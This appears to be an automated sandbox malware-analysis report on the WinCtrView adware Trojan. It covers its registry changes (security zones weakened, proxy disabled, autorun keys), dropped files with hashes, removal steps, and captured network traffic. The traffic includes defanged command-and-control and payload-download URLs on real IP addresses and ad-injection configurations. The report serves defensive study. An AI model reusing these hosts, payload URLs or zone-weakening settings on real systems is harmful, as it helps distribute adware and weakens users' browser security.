[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"USER_NO" = "3207"
"Version" = "1425"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\WinCtrView]
"Intro_No" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\WinCtrView]
"AdFlag" = "Y"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
The process irsetup.exe:2560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\WinCtrView]
"PDR" = "asdfaeiqwerh"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""
[HKCU\Software\WinCtrView]
"SUBNAME" = "MAIN"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\WinCtrView]
"CURDIR" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\WinCtrView]
"ver" = "sup"
"Commit" = "Y"
"USER_NO" = "3207"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"Version" = "0000"
"S_NO" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 0C 08 86 26 4F 61 3B D7 63 73 23 A3 3B 49 D8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\WinCtrView]
"Upmom" = "Y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"Owner" = "admin"
To run itself automatically each time Windows boots, the Trojan adds the following links to its files under the system registry autorun keys:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrProc.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrCon.exe"
Dropped PE files
MD5 | File path |
---|---|
ab737bdca5bd2c94190ec302dfd59c19 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe |
a1ab43b5989a03d746ca9774be160428 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe |
a0a7d422ce7a6959e3dd8762c27b63e7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVision\WinCtrCon.exe |
a1ab43b5989a03d746ca9774be160428 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe |
3fe7c92dba5c9240b4ab0d6a87e6166a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe |
ab737bdca5bd2c94190ec302dfd59c19 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrCon[1].exe |
a1ab43b5989a03d746ca9774be160428 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrProc[1].exe |
90a39346e9b67f132ef133725c487ff6 | c:\WINDOWS\system32\MSINET.OCX |
84742b5754690ed667372be561cf518d | c:\WINDOWS\system32\VB6KO.DLL |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2700
WinCtrCon.exe:2684
WinCtrCon.exe:2880
WinCtrProc.exe:2352
WinCtrProc.exe:1992
WinCtrProc.exe:2504
WinCtrProc.exe:1764
irsetup.exe:2560
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WinCtrProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\background_gradient[1] (453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\down[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[2] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\keyword_platinum[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\Uninstall_Ctr[1].exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\ErrorPageTemplate[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\down[1] (3 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrCon[1].exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ErrorPageTemplate[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\background_gradient[1] (453 bytes)
%System%\VB6KO.DLL (2712 bytes)
%System%\MSINET.OCX (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrCon.exe (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -oJzqEOx"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -oJzqEOx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe -DYOFTdMM"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrProc.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrCon.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: Setup Factory 8.0 Runtime
Product Version: 8.2.1.0
Legal Copyright: Setup Engine Copyright (c) 2004-2009 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf80_launch.exe
Internal Name: suf80_launch
File Version: 8.2.1.0
File Description: Setup Application
Comments: Created with Setup Factory 8.0
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 28836 | 32768 | 4.26507 | a8dbcac095aef6f1ff0f56e91c5abc15 |
.rdata | 36864 | 10370 | 12288 | 3.44532 | efb6029b9a5f70171975f6b5a16c78ce |
.data | 49152 | 6440 | 4096 | 1.54728 | cf8d7dd9f4b828868db85743b8601f51 |
.rsrc | 57344 | 28040 | 28672 | 4.06487 | 05962a2c16ea40395e7b662814eba9fd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 48
0e1bf09cea8e7cf2d8ff215b54ccc3ff
a49308a10aaee870b0df1a54629f8e17
60c64e1ff797f0586d4e4fa8b71590fb
662f48cd18a06ab7fa7a036c39dd5009
a05a82856ecb0e9f04dee5f2b945355c
c3150d4a50452db71ce563353ba982af
d96bf3515187f64e04bc30c105eeffaa
c0bf80b9314aec2b1dca0dcb2662f42d
4f2dafde6729cd7069faa9e1a06ecedb
1dc3cb8f363bde761d4cff6e874f7609
7228c9c464e45dfc0264a4019ca146fb
2597664b2e6285188d3d631b91994a18
75661c1238712c2f813f39573d17e3e7
0fbdc557bdaf578aaa19147db21e4012
43f8dcc02375f67a0e411919bd06b54a
e4c660519851bbe292368e3a7cb00ca9
7de8827aa702c300956323b1f4408aa3
37c7a82fd9d93839940b6755084eb844
a9cfc02550286222aa6b07424e159523
be7bba96ba96a6b248fd7c24a2eb94a6
a1805d6c7edcebbddefd1d32595c4580
b68a1540a80d73a0fedfe26de0b51f5c
1462692343053a348957da43cee36715
533a8afedeb6a7c60817a50267fa531f
9e39362e67d6050c244902574bb7eba7
Network Activity
URLs
URL | IP |
---|---|
hxxp://220.73.162.43/Config/sTakeList.asp?n=3207 | |
hxxp://220.73.162.58/Config/AdNw/FcTimeLab.asp | |
hxxp://220.73.162.58/Config/NewConf/ProgramUpdateLab.asp?version=1423 | |
hxxp://220.73.162.2/Download/WinCtrProc.exe | |
hxxp://hostserver.kr/Config/AdNw/StakePsList.asp?uno=3207 | 220.73.162.54 |
hxxp://220.73.162.45/Config/FormLocation.asp | |
hxxp://220.73.162.45/Config/AdNw/FcPimSLab.asp | |
hxxp://220.73.162.45/Config/newConf/UCg_LPrMLab.asp?user_no=3207 | |
hxxp://220.73.162.45/Config/TransSiteString.asp?nation=KOREA | |
hxxp://220.73.162.4/Download/WinCtrCon.exe | |
hxxp://korserver.com/Config/sTakeList.asp?n=3207 | 220.73.162.52 |
hxxp://220.73.162.24/Config/AdNw/FcTimeLab.asp | |
hxxp://220.73.162.24/Config/NewConf/ProgramUpdateLab.asp?version=1425 | |
hxxp://hostserver.kr/Config/FormLocation.asp | 220.73.162.54 |
hxxp://hostserver.kr/Config/AdNw/FcPimSLab.asp | 220.73.162.54 |
hxxp://hostserver.kr/Config/newConf/UCg_LPrMLab.asp?user_no=3207 | 220.73.162.54 |
hxxp://hostserver.kr/Config/TransSiteString.asp?nation=KOREA | 220.73.162.54 |
hxxp://hostserver.kr/config/keyword_platinum.asp?user_no=3207&SubName=MAIN | 220.73.162.54 |
hxxp://hostserver.kr/Config/ipget.asp?kn=first&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | 220.73.162.54 |
hxxp://hostserver.kr/Config/ipget.asp?kn=every&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | 220.73.162.54 |
hxxp://220.73.162.2/Download/Uninstall_Ctr.exe | |
hxxp://220.73.162.54/Config/newConf/UCg_LPrMLab.asp?user_no=3207 | |
hxxp://220.73.162.54/Config/AdNw/FcPimSLab.asp | |
hxxp://220.73.162.54/Config/TransSiteString.asp?nation=KOREA | |
hxxp://220.73.162.54/config/keyword_platinum.asp?user_no=3207&SubName=MAIN | |
hxxp://220.73.162.54/Config/FormLocation.asp | |
hxxp://220.73.162.54/Config/ipget.asp?kn=first&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | |
hxxp://220.73.162.54/Config/ipget.asp?kn=every&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | |
hxxp://duzip.com/Config/sTakeList.asp?n=3207 | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Download/Uninstall_Ctr.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.2
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 19 May 2014 04:47:29 GMT
Accept-Ranges: bytes
ETag: "ee1889701d73cf1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:12:41 GMT
Content-Length: 191968
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.............................`.......Rich............................PE..L...8.yS..................... .......(............@.................................(...........................................(.......@...................................................................8... ....................................text............................... ..`.data...............................@....rsrc...@...........................@..@=..H............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /Config/AdNw/FcTimeLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.58
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCAACASST=GFOFJLBANCCMJPEPACALIDDN; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:45 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,http://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/NewConf/ProgramUpdateLab.asp?version=1423 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.58
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCAACASST=GFOFJLBANCCMJPEPACALIDDN
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:47 GMT
1425|WinCtrProc.exe..
GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:18 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://cafe.naver.com/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..hXXp://kin.naver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..hXXp://news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://section.blog.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#..hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://VVV.naver.com|882|C|882|260|R|L|6|6|255#..hXXp://agora.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://agoraplaza.media.daum.net/petition/petition.do?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_blog/_top|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/event/event_list.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/?_top_blogtop=navi_cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/top/top.html?_top_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cartoon.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://issue.media.daum.ne
<<
<<< skipped >>>
GET /Config/AdNw/FcPimSLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:18 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,http://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/newConf/UCg_LPrMLab.asp?user_no=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 396
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:19 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:19 GMT
KOREA|Y|N|N|Y|hXXp://kr.search.yahoo.com/search?fr=clickstory_kr_synd_search&ovt=A_P_AB_cityfriend_5&p=|Y|N|N|0|hXXp://220.73.162.53/config/LanguageTranslate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://kr.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|....
GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12071
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:19 GMT
KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http://fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http://translate.google.com/translate?,u=[3][KEYWORD],sl=[1